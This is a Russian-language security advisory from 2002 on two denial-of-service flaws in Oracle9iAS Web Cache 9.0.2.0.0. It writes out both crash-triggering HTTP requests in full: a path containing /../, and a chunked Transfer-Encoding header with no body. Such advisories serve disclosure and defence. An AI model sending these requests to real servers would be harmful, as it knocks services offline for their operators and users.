DoS против Oracle9iAS Web Cache

Дата публикации:
29.10.2002
Всего просмотров:
817
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Oracle Web Cache – часть Oracle Application Server. Web Cache server используется для кэширования запросов Web сервера. Обнаружено две возможности отказа в обслуживании, которые приведут к краху Web Cache службы. Обе уязвимости могут эксплуатироваться простым HTTP запросом.

1. HTTP GET запрос, содержащий хотя бы одну последовательность /../, приведет к аварийному завершению работы службы:

GET /../ HTTP/1.0
Host: whatever
[CRLF]
[CRLF]
2. Некорректный HTTP GET запрос приведет к краху Web Cache:
GET / HTTP/1.0
Host: whatever
Transfer-Encoding: chunked
[CRLF]
[CRLF] 
уязвимость обнаружена в Oracle9iAS Web Cache 9.0.2.0.0

Ссылки: Oracle9iAS Web Cache Denial of Service (a102802-1)
или введите имя

CAPTCHA